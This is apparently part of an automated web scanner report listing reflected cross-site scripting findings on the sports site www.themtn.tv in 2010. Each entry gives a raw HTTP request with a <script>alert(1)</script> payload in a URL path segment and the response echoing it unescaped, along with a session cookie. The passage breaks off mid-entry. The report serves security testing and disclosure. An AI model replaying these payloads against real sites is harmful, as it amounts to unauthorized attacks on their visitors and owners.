GET /12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.htmla0d9d<script>alert(1)</script>e71bf1d2bf8 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:45 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.htmla0d9d<script>alert(1)</script>e71bf1d2bf8"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad6b3<script>alert(1)</script>9828d68270 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.htmlad6b3<script>alert(1)</script>9828d68270 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:50 GMT Content-Length: 805 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.htmlad6b3<script>alert(1)</script>9828d68270"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10be6<script>alert(1)</script>2f27386048 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html10be6<script>alert(1)</script>2f27386048 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:47 GMT Content-Length: 805 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html10be6<script>alert(1)</script>2f27386048"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84c4d<script>alert(1)</script>72c69fd9274 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html84c4d<script>alert(1)</script>72c69fd9274 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:50 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html84c4d<script>alert(1)</script>72c69fd9274"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6ecb8<script>alert(1)</script>5cb81e80486 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html6ecb8<script>alert(1)</script>5cb81e80486 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:49 GMT Content-Length: 797 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html6ecb8<script>alert(1)</script>5cb81e80486"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 37474<script>alert(1)</script>2767a74a520 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html37474<script>alert(1)</script>2767a74a520 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:56 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html37474<script>alert(1)</script>2767a74a520"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 90aa2<script>alert(1)</script>d822eeaa35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html90aa2<script>alert(1)</script>d822eeaa35 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:57 GMT Content-Length: 805 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html90aa2<script>alert(1)</script>d822eeaa35"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 30a2e<script>alert(1)</script>e374858b3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html30a2e<script>alert(1)</script>e374858b3f9 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:56 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html30a2e<script>alert(1)</script>e374858b3f9"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83f1a<script>alert(1)</script>d7cbbdda941 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html83f1a<script>alert(1)</script>d7cbbdda941 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:00 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html83f1a<script>alert(1)</script>d7cbbdda941"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 814ee<script>alert(1)</script>ee47c2c20b4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html814ee<script>alert(1)</script>ee47c2c20b4 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:04 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html814ee<script>alert(1)</script>ee47c2c20b4"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 49a89<script>alert(1)</script>cab4e73d633 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html49a89<script>alert(1)</script>cab4e73d633 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:00 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html49a89<script>alert(1)</script>cab4e73d633"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd355<script>alert(1)</script>1470f4268fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.htmlfd355<script>alert(1)</script>1470f4268fb HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:00 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.htmlfd355<script>alert(1)</script>1470f4268fb"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 343c1<script>alert(1)</script>541d76c6c86 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html343c1<script>alert(1)</script>541d76c6c86 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:02 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html343c1<script>alert(1)</script>541d76c6c86"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80565<script>alert(1)</script>0ff5d89c640 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html80565<script>alert(1)</script>0ff5d89c640 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:02 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html80565<script>alert(1)</script>0ff5d89c640"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c3e3b<script>alert(1)</script>199ea53854b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.htmlc3e3b<script>alert(1)</script>199ea53854b HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:05 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.htmlc3e3b<script>alert(1)</script>199ea53854b"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4eb51<script>alert(1)</script>0d56f34802e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html4eb51<script>alert(1)</script>0d56f34802e HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:02 GMT Content-Length: 805 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html4eb51<script>alert(1)</script>0d56f34802e"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a99a9<script>alert(1)</script>386ffe1788 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /commona99a9<script>alert(1)</script>386ffe1788/ad_count.php HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:00 GMT Content-Length: 762 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/commona99a9<script>alert(1)</script>386ffe1788/ad_count.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffea4<script>alert(1)</script>f5f93be3da4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/ad_count.phpffea4<script>alert(1)</script>f5f93be3da4 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:00 GMT Content-Length: 763 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/ad_count.phpffea4<script>alert(1)</script>f5f93be3da4"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f64f<script>alert(1)</script>6b730c5afbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common1f64f<script>alert(1)</script>6b730c5afbf/dynrss/dynrss_3174_landing_.rss HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:09 GMT Content-Length: 782 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common1f64f<script>alert(1)</script>6b730c5afbf/dynrss/dynrss_3174_landing_.rss"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 95064<script>alert(1)</script>aa7d62804c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/dynrss95064<script>alert(1)</script>aa7d62804c2/dynrss_3174_landing_.rss HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:11 GMT Content-Length: 782 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/dynrss95064<script>alert(1)</script>aa7d62804c2/dynrss_3174_landing_.rss"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5041<script>alert(1)</script>7a7940557b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
